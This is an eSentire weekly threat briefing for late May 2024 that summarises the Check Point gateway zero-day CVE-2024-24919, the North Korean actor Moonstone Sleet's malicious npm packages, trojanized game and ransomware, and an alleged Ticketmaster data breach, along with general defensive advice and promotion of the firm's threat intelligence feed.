Weekly Threat Briefing: May 27 - 31, 2024
Every week, eSentire’s Threat Response Unit (TRU) compiles the following threat intelligence overview, providing cybersecurity leaders with expert analysis and insights on the most important events of the past week along with important security tips.
Get up to 50% off eSentire Threat Intelligence?
We’re thrilled to announce the launch of our first standalone cybersecurity product, eSentire Threat Intelligence, a curated feed of high-fidelity Indicators of Compromise (IOCs) with a 99% true positive rate that have been verified by our Elite Threat Hunters and Threat Response Unit (TRU).?
Learn how you can leverage eSentire Threat Intelligence to reduce false positive alerts and enhance your threat detection and response capabilities.
Check Point Zero-Day Targeted in Ongoing Attacks
On May 28th, Check Point confirmed the existence of an actively exploited zero-day vulnerability impacting Check Point Security Gateways. The vulnerability, tracked as CVE-2024-24919 (CVSS: 7.5), is an information disclosure vulnerability that impacts all Check Point Security Gateways that have either IPSec VPN or Mobile Access Software Blades enabled.
Exploitation would allow a remote threat actor to read certain information on Check Point Security Gateways including password hashes for all local accounts. Gateways using only Site-to-Site IPSEC VPN are not affected.
Check Point has confirmed attacks against a “small number of customers” and that exploitation has impacted organizations that continue to use password only authentication. Threat actors are believed to be exploiting the vulnerability to steal information that would enable remote access into victim environments.
On May 29th, eSentire Threat Response Unit (TRU) performed threat hunts based on known Indicators of Compromise (IoCs) and published a security advisory warning of active exploitation and encouraging organizations to apply patches. eSentire Managed Vulnerability Service has plugins in place to identify vulnerable versions of Check Point Security Gateways.
Moonstone Sleet Emerges as New North Korean Threat Actor with New Bag of Tricks
On May 28th, Microsoft’s Threat Intelligence team released a report on a new North Korean threat actor tracked as Moonstone Sleet (formerly Storm-1789). This actor has been observed employing a diverse range of tactics and techniques to achieve its objectives, which primarily revolve around espionage and revenue generation.
By presenting themselves as legitimate business entities, these actors successfully distribute trojanized software to unsuspecting users. This software is carefully designed to appear harmless, thus bypassing initial scrutiny and infecting devices with malware.
领英推荐
A notable tactic used by Moonstone Sleet involves targeting software developers through malicious npm packages. These packages, once integrated into legitimate software projects, serve as a conduit for the threat actors to inject malicious code.
One of the more innovative methods utilized by Moonstone Sleet is the development of a malicious game. Moonstone Sleet created a robust public campaign that includes websites and many X (formerly Twitter) accounts to bolster the game’s legitimacy. Malicious DLLs are loaded when the game is launched, resulting in the execution of a custom malware loader tracked as YouieLoad.
In addition to these tactics, Moonstone Sleet has developed and deployed custom ransomware tracked as FakePenny. This ransomware encrypts files on infected systems, demanding a ransom for their decryption. In an incident observed by Microsoft, the ransom demand was $6.6M USD in BTC.
To mitigate the risks posed by actors like Moonstone Sleet, organizations should adopt a multi-layered defense strategy. This includes regular security assessments, employee training on recognizing social engineering tactics, and the implementation of robust incident response plans. Additionally, credential hardening and access control measures are critical in protecting against unauthorized access and data breaches.
Ticketmaster Breach
On May 28th, a cybercriminal group posted an alleged database for sale online which they claimed to have contained information of 560 million LiveNation/Ticketmaster users.
According to vx-underground, through “multiple individuals privy to and involved in the alleged Ticketmaster breach" they were able to gather that the breach occurred sometime in April, where an unidentified threat group was able to get access to Ticketmaster's Amazon Web Service (AWS) instances by pivoting from a Managed Service Provider (MSP).
They claim that the Shiny Hunters group is not responsible for the breach but is acting as a proxy for the threat group responsible for the compromise.
This alleged data leak highlights the importance of layered security for companies holding large amounts of customer data, as they are highly valued targets for attackers. The eSentire Threat Response Unit (TRU) assesses this data set is likely legitimate and will impact a significant amount of Ticketmaster users.
Large data breaches like the Ticketmaster compromise, highlights the need for defense-in-depth strategies for any company holding valuable information. As multiple services are likely used within organizations, it is important for each of these services or service providers to maintain a high level of security to protect customers from potential compromises.
About the eSentire Threat Response Unit (TRU)
Our industry-renowned Threat Response Unit (TRU) is an elite team of threat hunters and researchers, that supports our 24/7 Security Operations Centers (SOCs), builds detection models across our XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. TRU has been recognized for its threat hunting, original research and content development capabilities. TRU is strategically organized into cross-functional groups to protect you against advanced and emerging threats, allowing your organization to gain leading threat intelligence and incredible cybersecurity acumen.